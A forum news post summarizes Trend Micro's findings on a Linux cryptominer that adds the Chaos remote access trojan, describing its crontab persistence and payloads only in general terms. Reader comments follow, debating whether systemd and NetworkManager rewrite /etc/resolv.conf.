Researchers smell a cryptomining Chaos RAT targeting Linux:
A type of cryptomining malware targeting Linux-based systems has added capabilities by incorporating an open source remote access trojan called Chaos RAT with several advanced functions that bad guys can use to control remote operating systems.
Trend Micro security researchers discovered the threat last month. Like earlier, similar versions of the miner that also target Linux operating systems, the code kills competing malware and resources that affect cryptocurrency mining performance.
The newer malware then establishes persistence "by altering /etc/crontab file, a UNIX task scheduler that, in this case, downloads itself every 10 minutes from Pastebin," wrote Trend Micro researchers David Fiser and Alfredo Oliveira.
After that, it downloads an XMRig miner, a configuration file, another payload that continually kills competing malware, and the Chaos RAT (remote access tool), which is written in Go and has a ton of capabilities including restarting and shutting down the victim's machine.
[...] "On the surface, the incorporation of a RAT into the infection routine of a cryptocurrency mining malware might seem relatively minor," Fiser and Oliveira said.
"However, given the tool's array of functions and the fact that this evolution shows that cloud-based threat actors are still evolving their campaigns, it is important that both organizations and individuals stay extra vigilant when it comes to security," they continued.
(Score: 2) by Opportunist on Monday December 19, @02:56PM
So trojans are the domain of jokers and skiddies again? I was under the impression that it's firmly in the grasp of for-profit criminals.
(Score: 2) by VLM on Monday December 19, @04:59PM (3 children)
Sure that's not a false alarm because its just systemd doin' its thing?
Anyone who's ever had to adjust their /etc/resolv.conf knows the feeling.
(Score: 4, Interesting) by RS3 on Monday December 19, @08:45PM (2 children)
You inspired me to check in on a server. No systemd running- I'm severely allergic. But I find /etc/resolv.conf regularly gets new timestamps (file contents remain unchanged though).
It turns out "NetworkManager", a kind of mini systemd IMHO, keeps doing this and that. I may disable it, but I don't want to waste time on it because I'm in the process of evaluating distros for something much more stable (no demonic daemons please). Very sadly, systemd is pervasive and has corrupted too many otherwise awesome distros.
Anyway, point is in some OSes a legit system process, other than systemd, might be actively changing system files, which makes it that much harder to figure out if something has infected the machine.
(Score: 0) by Anonymous Coward on Tuesday December 20, @06:00AM (1 child)
This is concerning. I just checked my /etc/resolv.conf and it has a timestamp for which I can't correlate with a change that I made. Contents is:
# Generated by NetworkManager
nameserver 127.0.0.53
Wth? If something is changing my network configuration I really like to know about it.
(Score: 2) by RS3 on Tuesday December 20, @06:31AM
Again, "NetworkManager" is the exact name of the process- see if you have that running ( ps aux | grep -i network ). Pretty obvious you do.
man NetworkManager
important stuff in:
/etc/NetworkManager
/etc/sysconfig
/etc/sysconfig/networking
/etc/sysconfig/network-scripts
...
Worse yet, maybe you have systemd too?
Which distro / version are you running?
(Score: 2) by Sjolfr on Monday December 19, @07:53PM (1 child)
Software 'systems' that break the fundamentals/standards of linux usage deserve this kind of thing. The problem here is that an administrator has to allow this CHAOS system absolute control of the systems they intend to manage with it. It's just like hiring a known spy to administer your data sensitive systems; you're asking for problems.
Any Linux Systems Engineer worth anything will tell you that there are standard systems tools to manage systems from anywhere. All one has to do is put them together in a way that fits within the security standards that are applicable. Same thing appiles for home users of linux ... learn the basics of the tools at your disposal and these all-in-one tools become irrelavent. Short cuts are not worth it and cause more issues in the long run. You'd think we could learn from M$ failures.
You may as well just broadcast your passwords in plain text and see if someone will login to your machine(s) and backup up your partition tables for you. That is not malware or a virus or a trojan ... it's a destructive program/practice that nearly-blind administrators let in to their systems.
(Score: 2) by Sjolfr on Monday December 19, @08:03PM
Christ ... the article is a pre-sales tool as well.
Instead of introducing an insecure practice/protocol/software in to your systems and then spend money to buy more software that may or may not actually mitigate the problem that you introduced ... don't use the software to begin with or get rid of it. Even a cursory evaluation of that CHAOS software makes me cringe.